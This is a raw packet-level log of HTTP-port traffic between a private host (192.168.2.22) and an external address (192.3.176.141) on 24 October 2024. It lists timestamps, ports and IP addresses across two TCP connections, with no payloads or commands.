Oct 24, 2024 21:22:43.932356119 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.932370901 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.932385921 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.932401896 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.932418108 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.932434082 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.932454109 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.932463884 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.932498932 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.932636023 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.938205004 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.938250065 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.938281059 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.938286066 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.938323021 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.938359022 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.938410044 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.938493013 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.938493013 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.938493013 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.938493013 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.938493013 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.938676119 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.938726902 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.938807011 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.938858986 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.938955069 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.938991070 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.939004898 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.939032078 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.939518929 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.939573050 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.939578056 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.939611912 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.939624071 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.939657927 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.939862967 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.939915895 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.939920902 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.939951897 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.939965963 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.939986944 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.940002918 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.940022945 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.940033913 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.940078974 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.940572977 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.940624952 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.940654039 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.940690041 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.940706968 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.940737009 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.940742970 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.940777063 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.940789938 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.940812111 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.940824032 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.940849066 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.940860033 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.940900087 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.941617966 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.941648960 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.941669941 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.941698074 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.941755056 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.941783905 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.941803932 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.941819906 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.943470001 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.943499088 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.943526983 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.943546057 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.943551064 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.943587065 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.943598032 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.943619013 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.943638086 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.943654060 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.943655968 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.943689108 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.943705082 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.943736076 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.943937063 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.943965912 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.943990946 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.944006920 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.944040060 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.944092035 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.944092035 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.944144964 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.944274902 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.944309950 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.944328070 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.944361925 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.944608927 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.944664955 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.944691896 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.944746017 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.944902897 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.944937944 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.944963932 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.944982052 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.945257902 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.945286989 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.945311069 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.945337057 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.983555079 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.983604908 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.983669043 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.983697891 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.983891010 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.983891010 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:44.058161974 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:44.058207035 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:44.058243036 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:44.058303118 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:44.058516026 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:44.058516979 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:44.058516979 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:46.058552980 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:53.348249912 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:53.354376078 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:53.354482889 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:53.355494976 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:53.361211061 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.029520988 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.029572010 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.029608965 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.029643059 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.029679060 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.029731035 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.029731035 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.029731035 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.029767990 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.029805899 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.029834032 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.029834986 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.029834986 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.029843092 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.029869080 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.029880047 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.029889107 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.029917002 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.029938936 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.029969931 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.031651020 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.035921097 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.035974026 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.035993099 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.036012888 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.036035061 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.036071062 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.149787903 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.149838924 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.149872065 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.149884939 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.150047064 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.150048018 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.150047064 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.150098085 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.155231953 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.155255079 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.155287027 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.155302048 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.155436039 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.155455112 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.155491114 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.155508995 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.160835981 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.160896063 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.160914898 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.160923958 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.160952091 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.160955906 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.160955906 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.160969973 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.160985947 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.160995960 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.161015987 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.161035061 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.278250933 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.278302908 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.278326988 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.278345108 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.278393030 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.278393030 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.278851032 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.278906107 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.278912067 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.278943062 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.278954983 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.278999090 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.279051065 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.279087067 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.279114008 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.279123068 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.279135942 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.279175997 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.279742956 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.279778004 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.279794931 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.279814959 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.279825926 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.279870033 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.323817968 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.323942900 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.324012995 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.324048996 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.324069023 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.324069023 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.324086905 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.324106932 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.324106932 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.324136019 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.405548096 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.405594110 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.405625105 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.405656099 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.405657053 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.405705929 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.405726910 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.405764103 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.405765057 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.405802011 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.405817032 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.405838966 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.405867100 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.405879021 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.405895948 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.405919075 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.405930996 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.405980110 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.406506062 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.406567097 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.406656981 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.406712055 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.406806946 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.406867981 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.448122025 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.448148012 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.448185921 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.448189020 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.448208094 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.448225975 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.448251963 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.448282003 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.526376963 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.526454926 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.526603937 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.526603937 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.526659966 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.526695967 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.526715994 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.526732922 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.526757002 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.526779890 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.526926041 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.526962996 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.526988983 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.526998043 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.527010918 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.527050018 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.527055025 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.527105093 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.527710915 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.527769089 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.527861118 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.527894020 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.527921915 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.528065920 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.528107882 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.528126955 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.528130054 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.528181076 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.567300081 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.567353010 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.567389011 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.567410946 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.567447901 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.567475080 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.567504883 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.567531109 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.567552090 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.645529985 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.645565987 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.645728111 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.645864010 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.645879984 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.645895958 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.645931005 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.645931005 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.646114111 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.646130085 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.646143913 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.646193027 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.646193027 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.646549940 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.646565914 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.646581888 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.646625996 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.646625996 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.646939039 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.647015095 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.647069931 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.687156916 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.687192917 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.687227011 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.687275887 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.687309027 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.687352896 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.687352896 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.691214085 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.765810013 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.765922070 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.765974045 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.766026020 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.766060114 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.766125917 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.766125917 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.766226053 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.766241074 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.766275883 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.766305923 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.766309023 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.766328096 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.766819000 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.766853094 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.766884089 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.766891003 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.766911030 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.766927004 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.766953945 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.766974926 CEST	49167	80	192.168.2.22	192.3.176.141
